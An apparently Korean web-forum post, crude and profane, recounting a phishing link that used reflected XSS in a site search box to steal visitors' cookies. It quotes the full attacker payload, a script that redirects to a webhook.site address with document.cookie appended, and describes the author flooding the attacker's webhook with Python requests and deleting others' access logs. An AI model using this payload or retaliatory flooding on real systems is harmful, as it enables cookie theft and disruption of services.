37a7d868f5dc3f8650bbd58b368373697f2227



html로 실제로 이동될 url과 

보이는 url을 다르게 해서 사이트 접근 유도함.



실제로 이동된 url은




37a7d874abc236a14e81d2b628f1776d91fd6a




이런식으로 dc 검색창에 js코드 넣어서 검색실행된 url로 이동됨.

저렇게 검색창에 js코드 넣은것도 실행 되더라




37a7d875abc236a14e81d2b628f17d65e3bb


내가 진짜 개좆밥일때

이런식으로 해킹당할 수 있으니까 조심하라고 배웠던거 같은데

이정도는 막아줘야 하는거 아닌가

이게 어쩔 수 없는 부분인가?

(난 웹개발자 아니라서 모름)



여튼

<script>alert('쿠키 잘 털어간다ㅋㅋ');alert(document.cookie);document.location='https://webhook.site/(이새끼 고유 주소)?'+document.cookie;</script>



이런식으로 쿠키 잘털어간다고 능욕 한번 해주고

사용자 쿠키 털어다가

'저새끼 webhook.site 주소 + 사용자 쿠키내용' 으로 자동으로 이동하게 만듦.




37a7d873abc236a14e81d2b628f1756bd71672

37a7d870abc236a14e81d2b628f1756e90b53e


왜 저사이트로 이동하게 만들었냐면

누가 어떤 url로 접속했으며 host의 ip까지 볼 수 있거든

2번째 짤 까만색으로 칠한게 이새끼 고유 주소고

나머지는 내 아이피 뒷자리 가린거임


2번째짤 GET 부분 url에서 ? 이후 부분에서는 사용자 쿠키 내용이 전부 담겨있음.

(반대로 저렇게 니애미사망 같은거 적어놓고 접속하면 저것도 다 볼 수 있다는거)




이새낀 이런 짓으로

사용자의 ip + 쿠키를 훔쳐간거

* 그런데 난 또 시발 대단한거 훔쳐간줄 알았는데 디씨 쿠키만 가져가더라

(재차 말하지만 난 웹개발자가 아니라서 웹에 대해선 전혀 모름)




여튼 작동 원리에 대해 알았으니


37a78768f5dc3f8650bbd58b3683736818ed


python을 이용해

화끈하게 니애미사망으로 무한 접속 시도 해줌.




37a7d872abc236a14e81d2b628f1706d77c6a9

ㅇㅇ 사이트 사망

무료버전 써서 그런지 금방 뒤지더라



37a7d87eabc236a14e81d2b628f17c6deb69


심지어 이거 다른 사용자가 접속 로그도 다 삭제 가능함.


나 말고도 여러명이 접속했던데

내가 다 지워줬다


나는 어자피 앰생이라 내 아이피 얼마든지 훔쳐가도 상관없어서

그냥 놔뒀음






요약

1. 새벽에 피싱사이트로 dc쿠키 훔쳐가던 새끼 있음

2. 보안/웹 하나도 안배운 나도 알 수 있을 정도로 하찮은 방법이였음 (댓글로 누가 'XSS 공격'이라고 알려줌)

3. 사이트 폭파 시키고 + 접속한 사람들 로그 지움